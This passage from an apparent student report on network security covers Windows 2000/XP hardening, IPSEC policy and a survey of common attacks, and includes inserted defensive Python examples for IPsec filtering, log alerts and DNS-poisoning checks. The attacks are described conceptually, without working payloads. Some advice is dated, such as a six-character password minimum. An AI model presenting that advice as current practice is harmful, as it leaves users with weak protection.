requests.
Disable SNMP services
If null sessions are disabled, another easy way to gain system information is through
public SNMP. SNMP permits the monitoring and managing of a network from a single
workstation or several workstations, called SNMP managers. It's a family of
specifications that provide a means for collecting network management data from the
devices residing in a network. With an SNMP manager, you can query the network's
devices regarding the nature of their functions.
If there are no programs using SNMP, we can disable this service. This is the easiest way
to protect against hacks and free up some memory.
If SNMP access is needed, then we set SNMP not to run in a public mode:
- Open the registry editor.
- Go to HKLM > System > CurrentControlSet > Services > SNMP > Parameters >
ValidCommunities.
- Select Security > Permissions and change them to permit only approved users
access.
There is one more step to disabling public access to SNMP:
- Go to HKLM > System > CurrentControlSet > Services > SNMP > Parameters >
ExtensionAgents and delete the value that contains the
LANManagerMIB2Agent. Then rename the other entries to update the
sequence, i.e. 2, 3 etc., until the sequence begins with 1.
Disable unused services since they take up space and allow hackers to attack
through the ports they leave open. We should disable the Messenger service if it is not
used, since it gives the hacker system rights.
Local Security Policy Tips: To edit Windows 2000 or XP's Local Security
Policy follow this path:
- Start > Administrative Tools > Local Security Policy. The Local Security editor has the
same feel as the registry editor.
- Always set a password for the Administrator account.
- Set the password to 6 or more characters: Account Policies > Password Policy >
Minimum Password Length.
- Ensure passwords use a combination of letters and numbers. To enable this setting,
enable Account Policies > Password Policy > Password Must Meet Complexity Requirements.
- Enable an account lockout period: Account Lockout Duration.
- Require users to change their passwords.
- Set an Account Lockout Threshold.
Account Tips: The more accounts on a computer, the more entry points attackers
can try. Default accounts will always get us into trouble because the attacker does not
have to guess a user name. We must always disable the guest account if it is not needed.
There are tools that will allow an attacker to create accounts with Administrative
privileges on an unpatched Windows 2000 system. We must not log in as administrator if
we do not need to. Viruses or malicious scripts will try to run programs or modify
registry settings. If the user does not have access to perform these tasks then the
malicious script cannot either.
Terminal Services : 128 bit encryption must be used to avoid packet sniffers.
Change terminal services to log users off. If a session is left open a hacker might enter
that person's session. Another safety measure with terminal services, change the port
from the default port of 3389. If you want to learn how to perform this edit refer to
appendix A. This method will not really stop attacks, just avoid attackers doing a quick
scan or targeting port 3389.
Disable DNS Transfers - If using Active Directory, limit DNS zone transfers. Otherwise
attackers are able to scan the network and gain information about IP addresses and ports.
While there is no damage to our system by performing these scans, attackers can learn a
lot about your network. To disable them go to:
- Start > Programs > Administrative Tools > Computer Management > Services and
Applications > DNS > [server] > Forward Lookup Zones > [zone_name] > Properties.
-Add the IP addresses that are on your network. The best option is to disable zone
transfers by unchecking Allow Zone Transfers.
Port Scanners are very useful tools for finding ports open on our system or
network. Here are a couple we might try: SuperScan, NetScanTools Pro, GFI, and Nmap.
2.5 Network Layer Security
Network Layer Security among mutually trusting hosts is a relatively straightforward
problem to solve. The standard protocol technique, employed in IPSEC, involves
"encapsulating" an encrypted Network Layer packet inside a standard Network packet,
making the encryption transparent to intermediate nodes that must process packet headers
for routing, etc. Outgoing packets are authenticated, encrypted, and encapsulated just
before being sent to the network, and incoming packets are decapsulated, verified, and
decrypted immediately upon receipt. Key management in such a protocol is similarly
straightforward in the simplest case. Two hosts can use any key-agreement protocol to
negotiate keys with one another, and simply use those keys as part of the encapsulating
and decapsulating packet transforms.
In many applications, security at the network layer has a number of advantages over
security provided elsewhere in the protocol stack. Network semantics are usually hidden
from applications, which therefore automatically and transparently take advantage of
whatever network layer security services their environment provides. Especially
importantly, the network layer offers a remarkable flexibility not possible at higher or
lower levels of abstraction: security can be configured end-to-end (protecting traffic between two
hosts), route-to-route (protecting traffic passing over a particular set of links), edge-to-edge
(protecting traffic as it passes between "trusted" networks via an "untrusted" one),
or in any other configuration in which network nodes can be identified as appropriate
security endpoints.
2.5.1 TCP/IP – The Language of the Internet (refer to [12])
TCP/IP (Transport Control Protocol/Internet Protocol) is the "language" of the Internet.
Anything that can learn to "speak TCP/IP" can connect to the Internet. This is
functionality that occurs at the Network (IP) and Transport (TCP) layers in the ISO/OSI
Reference Model. Consequently, a host that has TCP/IP functionality (such as Unix,
OS/2, MacOS, or Windows NT) can easily support applications (such as Netscape's
Navigator) that use the network.
As noted, IP is a "network layer" protocol. This is the layer that allows the hosts to
actually "talk" to each other. It handles such things as carrying datagrams, mapping the Internet
address (such as 10.2.3.4) to a physical network address (such as 08:00:69:0a:ca:8f), and
routing, which takes care of making sure that all of the devices that have Internet
connectivity can find the way to each other.
2.5.2 Attacks against IP (refer to [12])
A number of attacks against IP are possible. Typically, these exploit the fact that IP does
not perform a robust mechanism for authentication for the source of the packet. This is
not necessarily a weakness by definition, but it is an important point, because it means
that the facility of host authentication has to be provided at a higher layer on the ISO/OSI
Reference Model. Today, applications that require strong host authentication (such as
cryptographic applications) do this at the application layer.
IP Spoofing
This is where one host claims to have the IP address of another. Since many systems
(such as router access control lists) define which packets may and which packets may not
pass based on the sender's IP address, this is a useful technique to an attacker: he can
send packets to a host, perhaps causing it to take some sort of action.
Additionally, some applications allow login based on the IP address of the person making
the request (such as the Berkeley r-commands). These are both good examples of how
trusting untrustable layers can provide security that is considered weak.
IP Session Hijacking
This is a relatively sophisticated attack, first described by Steve Bellovin. It is very
dangerous, however, because there are now toolkits available in the underground
community that allow even inexperienced hackers to perform this attack. IP Session
Hijacking is an attack whereby a user's session is taken over and placed under the control of the
attacker. If the user was in the middle of email, the attacker is looking at the email, and
then can execute any commands he wishes as the attacked user. The attacked user simply
sees his session dropped, and may simply log in again, perhaps not even noticing that the
attacker is still logged in on his account.
For the description of the attack, refer to the large network of networks in Figure 2.1.
Figure 2.1: A Wider View of Internet-connected Networks
In this attack, a user on host A is carrying on a session with host G. Perhaps this is a
telnet session, where the user is reading his email, or using a Unix shell account from
home. Somewhere in the network between A and G sits host H. The person on host H
watches the traffic between A and G, and runs a tool which starts to impersonate A to G,
and at the same time tells A to shut up, perhaps trying to convince it that G is no longer
on the net (which might happen in the event of a crash, or major network outage). After a
few seconds of this, if the attack is successful, host H has "hijacked" the session of our
user. Anything that the user can do legitimately can now be done by the attacker,
illegitimately. As far as G knows, nothing has happened.
This can be solved by replacing standard telnet-type applications with encrypted versions
of the same thing. In this case, the attacker can still take over the session, but he'll see
only "gibberish" because the session is encrypted. The attacker will not have the needed
cryptographic key(s) to decrypt the data stream from G, and will, therefore, be unable to
do anything with the session.
2.5.3 IPSEC policy Architecture (refer to [13])
Let us examine the architecture of Network Layer Security more closely, using IPSEC as
a specific example. In this environment, policy must be enforced whenever packets arrive
at or are about to leave a Network Layer endpoint (which could be an end host, a
gateway, a router, or a firewall). When an incoming packet arrives from the network, the
security endpoint first determines the processing it requires:
- If the packet is not protected, should it be accepted? This is essentially the "traditional"
packet filtering problem, as performed, e.g., by network firewalls.
- If the packet was encapsulated under the security protocol:
Is there correct key material (usually contained in a data structure called a "security
association") required to decapsulate it? Should the resulting packet (after decapsulation)
be accepted?
A second stage of packet filtering occurs at this point. Notice that a packet may be
successfully decapsulated and still not be accepted (e.g., a decapsulated packet might
contain an illegal network source IP address such as 127.0.0.1).
A security endpoint makes similar decisions when an outgoing packet is ready to be sent:
- Is there a security association (SA) that should be applied to this packet?
If there are several applicable SAs, which one should be selected?
- If there is no SA available, how should the packet be handled? It may be forwarded to
some network interface, dropped, or queued until an SA is made available, possibly after
triggering some automated key management mechanism such as the IPSEC ISAKMP
protocol.
Observe that because these questions are asked on a packet-by-packet basis, policy filtering
must be performed, and any related security transforms applied, quickly enough to keep
up with network data rates. This implies that in all but the slowest network environments
there is insufficient time to process elaborate security languages, perform public key
operations, consult large tables, or resolve rule conflicts in any sophisticated manner.
Implementations of Network Layer Security services, including IPSEC and most
firewalls, therefore, usually employ very simple, filter-based languages for configuring
their packet-handling policies. In general, these languages specify routing rules for
handling packets that match bit patterns in packet headers, based on such parameters as
incoming and outgoing addresses and ports, services, packet options, etc.
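The per-packet decisions described above, as an added example (not the report's own code and not a real IPsec implementation): a toy security endpoint in Python with a filter-style rule list matched on header selectors, an SA table keyed by SPI, the no-SA case for outgoing packets, and the two-stage inbound check, including a decapsulated packet whose source is 127.0.0.1. The packet layout, addresses, key, and the SHAKE-keystream/HMAC transform are constructed assumptions standing in for ESP.

```python
# Added example (not from the report): a toy IPsec-style security endpoint that makes the
# per-packet decisions of section 2.5.3 on constructed packets. The packet layout, policy
# rules, SA table and toy transform (SHAKE keystream + HMAC tag) are illustrative assumptions.
from dataclasses import dataclass
from ipaddress import ip_address, ip_network
from typing import Dict, List, Optional
import hashlib
import hmac
@dataclass
class Packet:
    src: str
    dst: str
    payload: bytes
    spi: Optional[int] = None   # set only on an encapsulated (protected) packet

@dataclass
class Rule:                     # filter-style policy entry: address selectors plus action
    src: str                    # CIDR selectors matched against the packet header
    dst: str
    action: str                 # "bypass", "discard" or "protect"

@dataclass
class SA:                       # security association: key material shared with one peer
    spi: int
    peer: str                   # address of the remote security endpoint
    protects: str               # CIDR of the traffic behind that peer
    key: bytes

def first_match(spd: List[Rule], pkt: Packet) -> Optional[Rule]:
    # bit-pattern lookup on the header: the first rule whose selectors match wins
    for r in spd:
        if ip_address(pkt.src) in ip_network(r.src) and ip_address(pkt.dst) in ip_network(r.dst):
            return r
    return None

class SecurityEndpoint:
    def __init__(self, addr: str, spd: List[Rule], sas: List[SA]):
        self.addr, self.spd = addr, spd
        self.sad: Dict[int, SA] = {sa.spi: sa for sa in sas}   # SA database keyed by SPI

    def _xor(self, sa: SA, data: bytes) -> bytes:
        ks = hashlib.shake_256(sa.key + sa.spi.to_bytes(4, "big")).digest(len(data))
        return bytes(a ^ b for a, b in zip(data, ks))

    def _tag(self, sa: SA, ct: bytes) -> bytes:
        return hmac.new(sa.key, sa.spi.to_bytes(4, "big") + ct, hashlib.sha256).digest()

    def encapsulate(self, sa: SA, inner: Packet) -> Packet:
        # authenticate and encrypt the inner packet, then wrap it in an outer packet to the peer
        ct = self._xor(sa, f"{inner.src}|{inner.dst}|".encode() + inner.payload)
        return Packet(self.addr, sa.peer, self._tag(sa, ct) + ct, spi=sa.spi)

    def decapsulate(self, sa: SA, outer: Packet) -> Optional[Packet]:
        tag, ct = outer.payload[:32], outer.payload[32:]   # 32-byte HMAC-SHA256 tag comes first
        if not hmac.compare_digest(tag, self._tag(sa, ct)):
            return None                         # verification failed
        src, dst, payload = self._xor(sa, ct).split(b"|", 2)
        return Packet(src.decode(), dst.decode(), payload)

    def inbound(self, pkt: Packet):
        if pkt.spi is None:                     # unprotected: the "traditional" filtering decision
            rule = first_match(self.spd, pkt)
            return ("accept", pkt) if rule and rule.action == "bypass" else ("discard", None)
        sa = self.sad.get(pkt.spi)
        inner = self.decapsulate(sa, pkt) if sa and sa.peer == pkt.src else None
        if inner is None:                       # no key material for this SPI/peer, or bad tag
            return ("discard", None)
        rule = first_match(self.spd, inner)     # second filtering stage on the inner packet
        if rule is None or rule.action == "discard" or ip_address(inner.src).is_loopback:
            return ("discard", None)
        return ("accept", inner)

    def outbound(self, pkt: Packet):
        rule = first_match(self.spd, pkt)
        if rule is None or rule.action == "discard":
            return ("discard", None)
        if rule.action == "bypass":
            return ("send", pkt)
        cands = [s for s in self.sad.values() if ip_address(pkt.dst) in ip_network(s.protects)]
        if not cands:   # no SA yet: drop (a real endpoint might instead queue and trigger ISAKMP)
            return ("discard", None)
        sa = max(cands, key=lambda s: ip_network(s.protects).prefixlen)   # most specific SA
        return ("send", self.encapsulate(sa, pkt))

def demo() -> Dict[str, str]:
    # Constructed scenario: GW_A (203.0.113.1) fronts 10.1.0.0/16, GW_B (198.51.100.1) fronts
    # 10.2.0.0/16; they share one SA, and 192.0.2.0/24 may reach 10.1.0.0/16 unprotected.
    spd = [Rule("10.1.0.0/16", "10.2.0.0/16", "protect"), Rule("10.2.0.0/16", "10.1.0.0/16", "protect"),
           Rule("192.0.2.0/24", "10.1.0.0/16", "bypass"), Rule("0.0.0.0/0", "0.0.0.0/0", "discard")]
    key = b"constructed-shared-key"
    gw_a = SecurityEndpoint("203.0.113.1", spd, [SA(0x1001, "198.51.100.1", "10.2.0.0/16", key)])
    gw_b = SecurityEndpoint("198.51.100.1", spd, [SA(0x1001, "203.0.113.1", "10.1.0.0/16", key)])
    sent, outer = gw_b.outbound(Packet("10.2.5.5", "10.1.7.7", b"hello"))
    got, inner = gw_a.inbound(outer)
    forged = gw_b.encapsulate(gw_b.sad[0x1001], Packet("127.0.0.1", "10.1.7.7", b"x"))
    tampered = Packet(outer.src, outer.dst, bytes([outer.payload[0] ^ 1]) + outer.payload[1:], outer.spi)
    return {"protected": f"{sent}/{got}/{inner.payload.decode()}",
            "plain_partner": gw_a.inbound(Packet("192.0.2.9", "10.1.7.7", b""))[0],
            "plain_other": gw_a.inbound(Packet("198.18.5.5", "10.1.7.7", b""))[0],
            "loopback_inner": gw_a.inbound(forged)[0], "bad_tag": gw_a.inbound(tampered)[0]}
```

Note that the forged packet decapsulates and verifies correctly; it is only the second filtering stage that rejects it, which is the point the text makes about 127.0.0.1.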
2.6 Internal Network Security
Although focusing on securing the network’s perimeter is important, securing it internally
is equally important. If by some way a hacker manages to get in the network, he should
not be able to wander around easily without getting caught. Therefore, one should apply
the following to make the internal network secure:
• Patch and update all PCs before they are connected to the network, and then on a
regular basis. Note that patches need to be tested to avoid having problems with
databases or applications [3].
• System administrators should use one-time passwords only. In this way, in case a
hacker cracks the Admin’s password, it would only be valid for this one session.
An example of a one-time password mechanism is the SecurID by RSA [3].
• When an application is installed, some service accounts may be created. They are
accounts which do not have a human user associated to them. These accounts are
assigned default passwords that will most likely never be changed. Therefore, it is
important for an administrator to regularly change these passwords and monitor
the logs of these service accounts.
• Monitoring of logs is important: administrators should regularly read the logs to
monitor any unusual use of an account. Many freeware tools (such as log-IDS by
Adam Richard [3]) can help decipher the logs (which otherwise are almost
impossible to read) in something that the administrator can understand. Moreover,
by using a centralized syslog server, it will be much more difficult for hackers to
access them and edit them.
• Also, available freeware such as EventAlarm is useful when the Administrator
wants to monitor a user’s logging in and out quickly. Such freeware gives
pop-up screen alarms to the administrator whenever user X or Y logs on or off.
Moreover, this freeware can be licensed and additional options can be added so
that alarms are given in various situations.
• Segregating the network can reduce vulnerabilities. In this way, a user will have
specific privileges and would not be able to access all parts of the networks (like
vital servers, or other department’s files). So if ever a hacker cracks a user ID and
password, less damage will be made if there is segregation: he won’t be able to
access the whole network.
If these rules are properly followed in our FYP, potential problems can be lessened,
whether they come from a hacker that has got in or from a legitimate user with bad intentions.
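The log-monitoring recommendations above, as an added example (not the report's own code): a Python check over a few constructed syslog lines that flags interactive logins by service accounts, administrator logins outside working hours, and a login that succeeds after repeated failures. The log format, account names, working hours and threshold are assumptions.

```python
# Added example (not from the report): a small check of the kind section 2.6 recommends an
# administrator run over a centralized syslog feed. It flags interactive logins by service
# accounts, administrator logins outside working hours, and a success after repeated failures.
# Log format, account names, hours and thresholds are constructed assumptions.
import re
from collections import defaultdict
from datetime import datetime
from typing import Dict, List, Optional

LOG_RE = re.compile(r"^(?P<ts>\S+) (?P<host>\S+) sshd\[\d+\]: (?P<result>Accepted|Failed) "
                    r"password for (?P<user>\S+) from (?P<ip>\S+)")
SERVICE_ACCOUNTS = {"svc_backup", "svc_db"}   # accounts created by applications, no human user
ADMIN_ACCOUNTS = {"root", "admin"}
WORK_HOURS = range(8, 19)                     # 08:00 to 18:59
FAIL_THRESHOLD = 3

SAMPLE_LOG = """\
2006-03-01T09:12:03 web01 sshd[4021]: Accepted password for alice from 10.1.2.3 port 51234 ssh2
2006-03-01T10:05:11 web01 sshd[4100]: Accepted password for svc_backup from 10.1.9.9 port 40001 ssh2
2006-03-01T23:41:07 db01 sshd[5110]: Failed password for root from 192.0.2.55 port 3022 ssh2
2006-03-01T23:41:10 db01 sshd[5110]: Failed password for root from 192.0.2.55 port 3022 ssh2
2006-03-01T23:41:14 db01 sshd[5110]: Failed password for root from 192.0.2.55 port 3022 ssh2
2006-03-01T23:41:20 db01 sshd[5112]: Accepted password for root from 192.0.2.55 port 3023 ssh2
2006-03-02T08:30:00 web01 cron[77]: (root) CMD (run-parts /etc/cron.hourly)
"""

def parse(line: str) -> Optional[Dict[str, str]]:
    """Turn one syslog line into fields; lines that are not login events give None."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def analyze(lines) -> List[str]:
    alerts: List[str] = []
    failures: Dict[tuple, int] = defaultdict(int)   # (user, source ip) -> failures in a row
    for line in lines:
        ev = parse(line)
        if ev is None:
            continue
        key = (ev["user"], ev["ip"])
        if ev["result"] == "Failed":
            failures[key] += 1
            continue
        when = datetime.fromisoformat(ev["ts"])
        who = f"{ev['user']} from {ev['ip']} on {ev['host']} at {ev['ts']}"
        if ev["user"] in SERVICE_ACCOUNTS:
            alerts.append(f"service account logged in interactively: {who}")
        if ev["user"] in ADMIN_ACCOUNTS and when.hour not in WORK_HOURS:
            alerts.append(f"administrator login outside working hours: {who}")
        if failures[key] >= FAIL_THRESHOLD:
            alerts.append(f"success after {failures[key]} failures (possible password guessing): {who}")
        failures[key] = 0   # a successful login resets the failure run for this user/ip pair
    return alerts

if __name__ == "__main__":
    for alert in analyze(SAMPLE_LOG.splitlines()):
        print(alert)
```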
2.7 Survey of Most Common Threats
We will begin explaining attacks automated by malicious code then we will explain
hacker attacks not automated by malicious code. DoS attacks will constitute a section on
their own due to the fact they are the most widespread attack on the Internet. We will end
this section by an explanation of social engineering attacks.
2.7.1 Attacks Automated by Malicious Codes
Malicious code is a piece of software which can damage or alter data and programs on a
system without the permission or notice of the user. The sequence of instructions is used
to intentionally cause adverse effects to the system.
Figure 2.2: Classification of malicious code
We can see from the above figure that there are two types of malicious code: code that needs a host
program and code that is independent. Code that needs a host program consists of fragments of programs that cannot
exist independently of some actual application program, utility or system program.
Independent malicious codes are self-contained programs that can be run by the operating system.
1. Trojan Horse
A Trojan horse is a malicious, security-breaking program that is disguised as something
benign, such as a game, a directory lister or an archiver. The software is wrapped together
with the malicious code into a single file or program. The program appears to be
performing a useful function but it may also be quietly performing some harmful or
unwanted action such as deleting the victim’s files. The malicious code is typically a
back door, also known as an illicit server, but it can be a virus, worm or any other kind of
code that allows the attacker to do damage. Common ways to spread Trojan Horses are email, IRC
(Internet Relay Chat), and websites. An example of a Trojan horse file is: openme.gif.exe
(an extension is added to a seemingly harmless file). When the Trojan horse is executed it
will start its malicious job. If the job consists of planting a back door the attacker will be
notified (by email or IRC). Now the attacker can use the victim computer as a zombie in
a DDoS (Distributed Denial of Service; explained in a separate section later) attack to
flood a target system. The attacker can also remotely control the infected computer (open
the CD-ROM, send messages, open websites, reboot, listen to the microphone input,
delete files). The two most famous tools for creating back doors are Back Orifice and
NetBus. The backdoors are sent to the victim as Trojan horses (disguised as a harmless
program).
2. Virus
The virus is the most common type of malicious code. It can infect systems by attaching
itself to files and programs. Just like its biological counterpart, it needs a host to infect. A
virus is usually a program that needs to be executed by a user before it can do any
damage. For example, a virus attached to an email message is usually only harmful when
a user opens the attachment. Unlike a worm, a virus can not infect other computers
without assistance. It is propagated for example by humans trading programs with their
friends or by E-mail. The virus might only propagate itself and then allow the program to
run normally (without doing further damage). However, usually, after propagating
silently for a while, it starts doing things like writing cute messages on the terminal or
playing strange tricks with the display or even in extreme cases nuking the entire user’s
files.
So in summary the four phases of the life of a virus (after being executed) are:
The dormant phase (not all viruses have this stage): The virus is idle; it will
eventually be activated by some event, such as a date, the presence of another program or
file, or the capacity of the disk exceeding some limit.
The propagation phase: The virus places an identical copy of itself into other programs or
into certain system areas on the disk. Each infected program will now contain a clone of
the virus, which will itself enter a propagation phase.
The triggering phase: The virus is activated to perform the function for which it was
intended. As with the dormant phase, the triggering phase can be caused by a variety of
system events such as a count of the number of times the virus has copied itself.
The execution phase: The function is performed. The function may be harmless, such as a
message on the screen, or damaging, such as the destruction of programs and data files.
There are also different types of computer viruses:
Figure 2.3: Main types of viruses
Memory-resident virus: Lodges in main memory as part of a resident system program.
From that point on, the virus infects every program that executes.
Program file virus: This is the most common type of virus; it attaches itself to executable
files such as .EXE and .COM. The file acts as a carrier and when the file is executed or
opened, the malicious code executes and the virus spreads to infect other files.
Figure 2.4 Program File Virus
Polymorphic virus: This type of virus has the ability to change its signature to avoid
detection by anti-virus software. It attempts to trick anti-virus software by slightly
modifying its own code when it spreads to other files. A polymorphic virus can modify
itself by encrypting or compressing part of its code.
Boot Sector Virus: This type of virus attaches itself to the boot sector of a floppy or hard
disk. When the computer boots, the virus will reside in its memory and infect other disks.
Modern motherboards provide a BIOS option to enable boot sector virus protection, which
basically prevents modifications to the boot sector.
Stealth Virus: This type of virus attempts to hide itself to avoid detection by anti-virus
software. It attempts to mislead the services used to detect the virus. When the infected
file or boot sector is scanned by anti-virus software, the virus attempts to return the
properties of the original clean version of the file or boot sector.
Macro Virus: Macro viruses exploit vulnerabilities inherent to macro languages such as
Visual Basic in Microsoft Office. This type of virus is often found in Word documents.
When a user opens the document the malicious code is executed.
Email Virus: A more recent development in malicious software is the e-mail virus.
Rapidly spreading e-mail viruses make use of a Microsoft Word macro embedded in an
attachment. If the recipient opens the e-mail attachment, the Microsoft Word macro is
activated then: the e-mail virus sends itself to everyone on the mailing list in the user’s e-
mail package and the virus does local damage.
3. Worm
A worm is similar to a virus but there is one important difference: a worm doesn’t
need to attach itself to a file or program to be reproduced and executed as a virus does. A
worm is self-contained, it can replicate itself and infect entire networks. Because of the
recursive structure of the propagation, the spread rate of worms is very fast and poses a
big threat on the Internet infrastructure as a whole. Examples of Worms are: MyDoom,
Netsky, Bagle, Blaster, Code Red, Nimda.
4. Logic Bomb
A logic bomb is a smart piece of malicious code that executes only when certain
conditions are met; it is triggered when a certain event occurs. An example is a virus that
executes on April Fool’s day (but infected the system long before that date) or a
format.exe command that is executed only when the user logs on with administrative
permissions. Another example of a logic bomb sends a note to the hacker when the
infected computer is on the internet and runs a specific application such as MS Word.
This bomb does not actually begin the attack but tells the hacker that the victim has met
the needed state for an attack to begin.
Figure 2.5: Logic Bomb
1. Attacker implants logic bomb
2. Victim reports installation
3. Attacker sends attack message
Countermeasures against malicious code: Prevention and detection of malicious code
typically involves anti-virus and other detection products at gateways, mail servers, and
workstations. Those products generally scan messages for known signatures of a variety
of malicious code, or potentially dangerous behavioral characteristics. Differences
between products exist in detection capabilities and the range of malicious code included
in their signatures. Detection products should not be relied upon to detect all malicious
code. Additionally, anti-virus and other products that rely on signatures generally are
ineffective when the malicious code is encrypted. For example, VPNs, IPSec, and
encrypted e-mail will all shield malicious code from detection. Heuristic anti-virus
products generally execute code in a protected area of the host to analyze and detect any
hostile intent. Heuristic products are meant to defend against previously unknown or
disguised malicious code.
Malicious code may be blocked at the firewall or gateway. For
example, a general strategy might be to block all executable e-mail attachments, as well
as any ActiveX or Java applets. A more refined strategy might block based on certain
characteristics of known code. Protection of servers involves examining input from users
and only accepting that input which is expected. This activity is called filtering. If
filtering is not employed, a Web site visitor, for instance, could employ an attack that
inserts code into a response form, causing the server to perform certain actions. Those
actions could include changing or deleting data and initiating fund transfers. Protection
from malicious code also involves limiting the capabilities of the servers and Web
applications to only include functions necessary to support operations.
An additional detection control involves network and host intrusion detection devices. Network
intrusion detection devices can be tuned to alert when known malicious code attacks
occur. Host intrusion detection can be tuned to alert when they recognize abnormal
system behavior, the presence of unexpected files, and changes to other files.
2.7.2 Hackers Attacks (not automated by malicious codes)
1. Eavesdropping
The name eavesdropping comes from the fact that this technique involves secretly
listening to the data traveling through the attacked network. Other names for
eavesdropping include sniffing and snooping. Eavesdropping is only possible because
most data sent through connections are sent as plaintext and are unencrypted. Thus, a
hacker can just listen to the connection stream between the two connected users and get
whatever information he needs. This method is usually employed by those who are
unwilling to take large risks, as it is a very low-risk method. There is almost no
chance of getting caught when this method is used as no intrusion is involved and the
hacker can back off quickly without a trace if anything goes wrong. This method is also
used by those who want to listen to what is shared between two people, be it secret data
or just a personal conversation. In this respect, this method is the best for spies and
blackmailers [14].
2. IP spoofing
Most networks and operating systems use the IP address of a computer to identify a valid
entity. In certain cases, it is possible for an IP address to be falsely assumed (identity
spoofing). An attacker might also use special programs to construct IP packets that
appear to originate from valid addresses inside the corporate intranet. After gaining
access to the network with a valid IP address, the attacker can modify, reroute, or delete
your data. The attack may be directed to a specific computer addressed as though it is
from that same computer. This may make the computer think that it is talking to itself.
This may cause some operating systems such as Windows to crash or lock up.
3. Man in the middle attack
As the name indicates, a man-in-the-middle attack occurs when someone between you
and the person with whom you are communicating is actively monitoring, capturing, and
controlling your communication transparently. For example, the attacker can re-route a
data exchange. When computers are communicating at low levels of the network layer,
the computers might not be able to determine with whom they are exchanging data.
Session hijacking occurs through the following scenario. First, the attacker watches a
session open on a network. Once authentication is complete, he attacks the client
computer to disable it, and uses IP spoofing to claim to be the client who was just
authenticated and steal the session. Man-in-the-middle attacks are like someone assuming
your identity in order to read your messages. The person on the other end might believe it
is you because the attacker might be actively replying as you to keep the exchange going
and gain more information.
Countermeasure: This attack can be prevented if the two legitimate systems share a
secret which is checked periodically during the session.
4. Server spoofing
A C2MYAZZ utility can be run on Windows 95 stations to request LANMAN
authentication from the client (the LanMan password hash is used by Windows NT for
authenticating users locally and over the network [16]). The attacker runs this utility,
posing as the server, while the user attempts to log in. If the client is tricked into sending
LANMAN authentication, the attacker can read the username and password from the
network packets sent. [15]
Countermeasure: New operating systems are not vulnerable.
5. DNS poisoning
This is an attack where DNS information is falsified. This attack can succeed under the
right conditions, but may not be very practical as an attack form. The attacker will send
incorrect DNS information which can cause traffic to be diverted. The DNS information
can be falsified since name servers do not verify the source of a DNS reply. When a DNS
request is sent, an attacker can send a false DNS reply with additional bogus information
which the requesting DNS server may cache. This attack can be used to divert users from
a correct web server such as a bank and capture information from customers when they
attempt to log on. [15]
6. Password cracking
Sometimes in case of a partial break-in, the encrypted password file of a company might
be exposed to a hacker (or cracker in that case). If it happens, the attacker will start
password cracking the file, namely trying all the possible combinations with the idea to
find the weakest passwords and gain privileges later on. [17]
Countermeasure: In case the company is aware that its passwords' file has been
compromised, it should immediately notify all employees to change their passwords, so
even if weak passwords are exposed, they wouldn't be valid ones anymore. However, if
the company is not aware of its password file exposure, it should constantly try to crack
its password file just like an attacker would do and filter out the weakest passwords.
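For the DNS poisoning attack described in item 5 above, the following is an added example (not code from the report) of the resolver-side checks that defeat it: a reply is cached only if its transaction ID, source port, question and source address match a pending query, and "additional" records outside the queried zone are discarded. The message layouts are simplified stand-ins for real DNS packets, and the two-label zone rule in zone_of is an assumption.

```python
from dataclasses import dataclass, field


@dataclass
class Query:
    txid: int          # 16-bit transaction ID chosen by the resolver
    qname: str         # name being resolved
    server_ip: str     # name server the question was sent to
    src_port: int      # resolver's source port for this question
    sent_at: float     # seconds on a clock supplied by the caller


@dataclass
class Reply:
    txid: int
    qname: str
    from_ip: str       # source address of the reply packet
    to_port: int       # destination port of the reply packet
    answers: dict = field(default_factory=dict)     # name -> address
    additional: dict = field(default_factory=dict)  # extra "glue" records


def zone_of(qname: str) -> str:
    """Parent zone used for the bailiwick check: 'www.bank.example' -> 'bank.example'.
    Assumption: two-label zones; a real resolver uses the delegation it followed."""
    labels = qname.lower().rstrip(".").split(".")
    return ".".join(labels[-2:])


def in_bailiwick(name: str, qname: str) -> bool:
    """True if a record name belongs to the zone the question was about."""
    zone = zone_of(qname)
    n = name.lower().rstrip(".")
    return n == zone or n.endswith("." + zone)


class CachingResolver:
    def __init__(self, timeout: float = 5.0):
        self.timeout = timeout
        self.pending = {}   # (txid, src_port) -> Query
        self.cache = {}     # name -> address
        self.rejected = []  # (reason, reply) for the audit log

    def send_query(self, txid, qname, server_ip, src_port, now):
        self.pending[(txid, src_port)] = Query(txid, qname, server_ip, src_port, now)

    def receive_reply(self, reply: Reply, now: float) -> bool:
        key = (reply.txid, reply.to_port)
        q = self.pending.get(key)
        if q is None:
            return self._reject("no pending query with this ID and port", reply)
        if reply.from_ip != q.server_ip:
            return self._reject("reply from an address we did not query", reply)
        if reply.qname.lower() != q.qname.lower():
            return self._reject("question section does not match", reply)
        if now - q.sent_at > self.timeout:
            del self.pending[key]
            return self._reject("reply arrived after the query timed out", reply)
        # Cache only records inside the zone we asked about. Out-of-bailiwick
        # "additional" data is exactly what a poisoning reply tries to plant.
        for name, addr in {**reply.answers, **reply.additional}.items():
            if in_bailiwick(name, q.qname):
                self.cache[name.lower()] = addr
            else:
                self.rejected.append(("out-of-bailiwick record " + name, reply))
        del self.pending[key]
        return True

    def _reject(self, reason: str, reply: Reply) -> bool:
        self.rejected.append((reason, reply))
        return False


def demo():
    """Constructed exchange: a forged reply from the wrong address, then the
    honest reply carrying an out-of-bailiwick additional record."""
    r = CachingResolver()
    r.send_query(0x1234, "www.bank.example", "192.0.2.53", 40001, now=100.0)
    forged = Reply(0x1234, "www.bank.example", "203.0.113.9", 40001,
                   answers={"www.bank.example": "203.0.113.10"})
    forged_ok = r.receive_reply(forged, now=100.1)   # False: wrong source
    honest = Reply(0x1234, "www.bank.example", "192.0.2.53", 40001,
                   answers={"www.bank.example": "192.0.2.80"},
                   additional={"www.otherbank.example": "203.0.113.10"})
    honest_ok = r.receive_reply(honest, now=100.2)   # True, extra record dropped
    return forged_ok, honest_ok, dict(r.cache), [why for why, _ in r.rejected]
```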
2.7.3 DoS
A DoS (Denial of Service) attack is an attempt to prevent legitimate users of a service or
network resource from accessing that service or resource. DoS attacks are not targeted at
stealing, modifying or deleting information. A DoS attack comes in many forms, like
cutting off the power to a system or flooding a system with seemingly legitimate network
traffic; anything that results in a denial of service. DoS attacks usually make use of
software bugs to crash or freeze a service or network resource, or of bandwidth limits by
making use of a flood attack to saturate all bandwidth.
Different methods of DoS:
• DoS
A DoS attack is when the attacker launches an attack from his or her own computer. This
is done by sending packets of data to the remote computer; for each packet sent, the
target machine receives one. This is a very uncommon form of denial of service
because the attack is most of the time unsuccessful and can at times be easily
traced. DoS attacks are usually carried out by amateur script kiddies.
